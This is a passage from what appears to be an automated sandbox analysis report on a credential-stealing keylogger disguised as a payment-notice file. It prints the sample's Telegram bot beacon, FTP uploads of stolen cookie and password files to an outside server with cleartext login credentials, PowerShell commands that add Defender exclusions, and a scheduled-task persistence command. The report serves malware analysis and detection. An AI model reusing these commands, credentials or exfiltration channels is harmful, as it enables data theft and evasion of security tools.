                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 63599
                                                            Last-Modified: Wed, 02 Oct 2024 13:36:46 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=szijKAfckmwRlzg%2BgiXYul0uXbiJIyDs97aPEChlYip1yQe%2ByAzsLWJ13DN87l22PCyuENx9wrEGi%2FWU65%2BigdggTclwVuxOFnZaY0m3u29XyN%2FVfW737lcMzbOAOf7XqInjbcz9"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8ccb26091ad00f64-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-10-03 07:16:45 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                            2024-10-03 07:16:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            13192.168.2.749735188.114.96.34437664C:\Users\user\AppData\Roaming\SOFcFE.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-03 07:16:48 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            2024-10-03 07:16:48 UTC676INHTTP/1.1 200 OK
                                                            Date: Thu, 03 Oct 2024 07:16:48 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 63602
                                                            Last-Modified: Wed, 02 Oct 2024 13:36:46 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xWClVzzqYI9yI9PIC9dgIoaPyb9sswwhVuD0pzvn1iduW9kSNqMurLhuBZAgN2MJ9vxklE%2BETZNJnjOQw4lU2LUjsA1mkwVpa2U492iR4DKHhpbpkkvVkPQVNFce6JSp1aoHr%2F%2FG"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8ccb261c5ef543f1-EWR
                                                            2024-10-03 07:16:48 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                            2024-10-03 07:16:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            14192.168.2.749738188.114.96.34437664C:\Users\user\AppData\Roaming\SOFcFE.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-03 07:16:50 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-10-03 07:16:50 UTC684INHTTP/1.1 200 OK
                                                            Date: Thu, 03 Oct 2024 07:16:50 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 63604
                                                            Last-Modified: Wed, 02 Oct 2024 13:36:46 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4A%2FKLdtNMHVXj5bdWlOtlIzxIN%2FkplUmszL0Y%2By8I%2FEx1oCJ9CuA5Fus4L5KyBHUsNxWf9MjHB3LF%2FsN2GMYIGLaRjwxX5swfZU6%2BFE8SAhAvXik%2BejjDBbjsXoIV18RuEv7FAD9"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8ccb2627686a5e68-EWR
                                                            2024-10-03 07:16:50 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                            2024-10-03 07:16:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            15192.168.2.749740188.114.96.34437664C:\Users\user\AppData\Roaming\SOFcFE.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-03 07:16:52 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-10-03 07:16:52 UTC684INHTTP/1.1 200 OK
                                                            Date: Thu, 03 Oct 2024 07:16:52 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 63606
                                                            Last-Modified: Wed, 02 Oct 2024 13:36:46 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7ee7Z4aMe%2F%2Fp1F6%2FI4%2BXqLlKWqVN6mnMa%2B%2BsMwqYWuc7gsgu1EoBy6xCL8JzMTThD0MXENPZY7lQPOWRwmSn5kTgY6h5FjY73efTWFaebA6lSH1Us8Oay3dpXkvYiv6i3%2F8t0exD"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8ccb2631fab642ad-EWR
                                                            2024-10-03 07:16:52 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                            2024-10-03 07:16:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            16192.168.2.749743188.114.96.34437664C:\Users\user\AppData\Roaming\SOFcFE.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-03 07:16:54 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            2024-10-03 07:16:54 UTC676INHTTP/1.1 200 OK
                                                            Date: Thu, 03 Oct 2024 07:16:54 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 63608
                                                            Last-Modified: Wed, 02 Oct 2024 13:36:46 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SLc5WQex%2B40dCDD7IXRfBnQclgxKdf1ix2uIaEr836zl2u7XnazLzoXTwjTaVa7ZedoqC9nVCqLC3lF3xEpSiDLVpNpLThM5Am5QokRw%2BQIknUolDqxAPBoNzx30k6kfTdF9%2F3TC"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8ccb2641adab729b-EWR
                                                            2024-10-03 07:16:54 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                            2024-10-03 07:16:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            17192.168.2.749745188.114.96.34437664C:\Users\user\AppData\Roaming\SOFcFE.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-03 07:16:56 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-10-03 07:16:56 UTC682INHTTP/1.1 200 OK
                                                            Date: Thu, 03 Oct 2024 07:16:56 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 63610
                                                            Last-Modified: Wed, 02 Oct 2024 13:36:46 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y1E4%2BN2I8Wa%2BlXuGrN3wRxWBTsBz1fnAuROP5nZgnShuxLZ0hA66O8XRcPBvqA6g%2B9OwvggW3mYHppXGgOdJKjBbSbJF%2Bf7m0gYm%2FGppilyp%2FLumkvARPQXTtSbUu20oQ7AvTy4V"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8ccb264adf0e4344-EWR
                                                            2024-10-03 07:16:56 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                            2024-10-03 07:16:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            18192.168.2.749747149.154.167.2204437664C:\Users\user\AppData\Roaming\SOFcFE.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-03 07:16:59 UTC334OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724471%0D%0ADate%20and%20Time:%2003/10/2024%20/%2021:14:30%0D%0ACountry%20Name:%20%0D%0A%5B%20724471%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                            Host: api.telegram.org
                                                            Connection: Keep-Alive
                                                            2024-10-03 07:17:00 UTC344INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.18.0
                                                            Date: Thu, 03 Oct 2024 07:16:59 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 55
                                                            Connection: close
                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                            Access-Control-Allow-Origin: *
                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                            2024-10-03 07:17:00 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                            Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                            TimestampSource PortDest PortSource IPDest IPCommands
                                                            Oct 3, 2024 09:16:50.589318037 CEST2149737119.18.54.39192.168.2.7220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 20 of 150 allowed.
                                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 20 of 150 allowed.220-Local time is now 12:46. Server port: 21.
                                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 20 of 150 allowed.220-Local time is now 12:46. Server port: 21.220-IPv6 connections are also welcome on this server.
                                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 20 of 150 allowed.220-Local time is now 12:46. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                                            Oct 3, 2024 09:16:50.596858978 CEST4973721192.168.2.7119.18.54.39USER awaratre_log@awaratrendz.com
                                                            Oct 3, 2024 09:16:50.959996939 CEST2149737119.18.54.39192.168.2.7331 User awaratre_log@awaratrendz.com OK. Password required
                                                            Oct 3, 2024 09:16:50.960336924 CEST4973721192.168.2.7119.18.54.39PASS mxH!EyDs(.jx
                                                            Oct 3, 2024 09:16:51.658968925 CEST2149737119.18.54.39192.168.2.7230 OK. Current restricted directory is /
                                                            Oct 3, 2024 09:16:52.020490885 CEST2149737119.18.54.39192.168.2.7504 Unknown command
                                                            Oct 3, 2024 09:16:52.020718098 CEST4973721192.168.2.7119.18.54.39PWD
                                                            Oct 3, 2024 09:16:52.371349096 CEST2149737119.18.54.39192.168.2.7257 "/" is your current location
                                                            Oct 3, 2024 09:16:52.371491909 CEST4973721192.168.2.7119.18.54.39TYPE I
                                                            Oct 3, 2024 09:16:52.721925020 CEST2149737119.18.54.39192.168.2.7200 TYPE is now 8-bit binary
                                                            Oct 3, 2024 09:16:52.722063065 CEST4973721192.168.2.7119.18.54.39PASV
                                                            Oct 3, 2024 09:16:53.372594118 CEST2149737119.18.54.39192.168.2.7227 Entering Passive Mode (119,18,54,39,169,102)
                                                            Oct 3, 2024 09:16:53.372623920 CEST2149737119.18.54.39192.168.2.7227 Entering Passive Mode (119,18,54,39,169,102)
                                                            Oct 3, 2024 09:16:53.380671024 CEST4973721192.168.2.7119.18.54.39STOR 724471 - Cookies ID - ZyiAEnXWZP922243209.txt
                                                            Oct 3, 2024 09:16:54.289454937 CEST2149737119.18.54.39192.168.2.7150 Accepted data connection
                                                            Oct 3, 2024 09:16:54.661472082 CEST2149737119.18.54.39192.168.2.7226-File successfully transferred
                                                            226-File successfully transferred226 0.383 seconds (measured here), 2.65 Kbytes per second
                                                            Oct 3, 2024 09:17:06.264187098 CEST2149748119.18.54.39192.168.2.7220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 21 of 150 allowed.
                                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 21 of 150 allowed.220-Local time is now 12:47. Server port: 21.
                                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 21 of 150 allowed.220-Local time is now 12:47. Server port: 21.220-IPv6 connections are also welcome on this server.
                                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 21 of 150 allowed.220-Local time is now 12:47. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                                            Oct 3, 2024 09:17:06.264745951 CEST4974821192.168.2.7119.18.54.39USER awaratre_log@awaratrendz.com
                                                            Oct 3, 2024 09:17:06.609932899 CEST2149748119.18.54.39192.168.2.7331 User awaratre_log@awaratrendz.com OK. Password required
                                                            Oct 3, 2024 09:17:06.610325098 CEST4974821192.168.2.7119.18.54.39PASS mxH!EyDs(.jx
                                                            Oct 3, 2024 09:17:07.288722038 CEST2149748119.18.54.39192.168.2.7230 OK. Current restricted directory is /
                                                            Oct 3, 2024 09:17:07.635574102 CEST2149748119.18.54.39192.168.2.7504 Unknown command
                                                            Oct 3, 2024 09:17:07.635885954 CEST4974821192.168.2.7119.18.54.39PWD
                                                            Oct 3, 2024 09:17:07.979543924 CEST2149748119.18.54.39192.168.2.7257 "/" is your current location
                                                            Oct 3, 2024 09:17:07.980005026 CEST4974821192.168.2.7119.18.54.39TYPE I
                                                            Oct 3, 2024 09:17:08.339272976 CEST2149748119.18.54.39192.168.2.7200 TYPE is now 8-bit binary
                                                            Oct 3, 2024 09:17:08.339668036 CEST4974821192.168.2.7119.18.54.39PASV
                                                            Oct 3, 2024 09:17:08.688160896 CEST2149748119.18.54.39192.168.2.7227 Entering Passive Mode (119,18,54,39,186,166)
                                                            Oct 3, 2024 09:17:08.695727110 CEST4974821192.168.2.7119.18.54.39STOR 724471 - Passwords ID - ZyiAEnXWZP186224458.txt
                                                            Oct 3, 2024 09:17:09.608916044 CEST2149748119.18.54.39192.168.2.7150 Accepted data connection
                                                            Oct 3, 2024 09:17:09.961546898 CEST2149748119.18.54.39192.168.2.7150 Accepted data connection
                                                            Oct 3, 2024 09:17:09.964710951 CEST2149748119.18.54.39192.168.2.7226-File successfully transferred
                                                            226-File successfully transferred226 0.370 seconds (measured here), 0.91 Kbytes per second
                                                            Oct 3, 2024 09:17:11.471400023 CEST4974821192.168.2.7119.18.54.39PASV
                                                            Oct 3, 2024 09:17:11.816059113 CEST2149748119.18.54.39192.168.2.7227 Entering Passive Mode (119,18,54,39,127,70)
                                                            Oct 3, 2024 09:17:11.821758986 CEST4974821192.168.2.7119.18.54.39STOR 724471 - Cookies ID - ZyiAEnXWZP186224458.txt
                                                            Oct 3, 2024 09:17:12.700716972 CEST2149748119.18.54.39192.168.2.7150 Accepted data connection
                                                            Oct 3, 2024 09:17:13.044482946 CEST2149748119.18.54.39192.168.2.7226-File successfully transferred
                                                            226-File successfully transferred226 0.344 seconds (measured here), 2.95 Kbytes per second

                                                            Click to jump to process

                                                            Click to jump to process

                                                            Click to dive into process behavior distribution

                                                            Click to jump to process

                                                            Target ID:1
                                                            Start time:03:16:20
                                                            Start date:03/10/2024
                                                            Path:C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe"
                                                            Imagebase:0x980000
                                                            File size:884'224 bytes
                                                            MD5 hash:BE92B638000820878C7BE0E70E257C95
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:8
                                                            Start time:03:16:24
                                                            Start date:03/10/2024
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe"
                                                            Imagebase:0xc70000
                                                            File size:433'152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:9
                                                            Start time:03:16:24
                                                            Start date:03/10/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff75da10000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:10
                                                            Start time:03:16:25
                                                            Start date:03/10/2024
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SOFcFE.exe"
                                                            Imagebase:0xc70000
                                                            File size:433'152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:11
                                                            Start time:03:16:25
                                                            Start date:03/10/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff75da10000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:12
                                                            Start time:03:16:25
                                                            Start date:03/10/2024
                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SOFcFE" /XML "C:\Users\user\AppData\Local\Temp\tmpF6B6.tmp"
                                                            Imagebase:0x550000
                                                            File size:187'904 bytes
                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:13
                                                            Start time:03:16:25
                                                            Start date:03/10/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff75da10000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
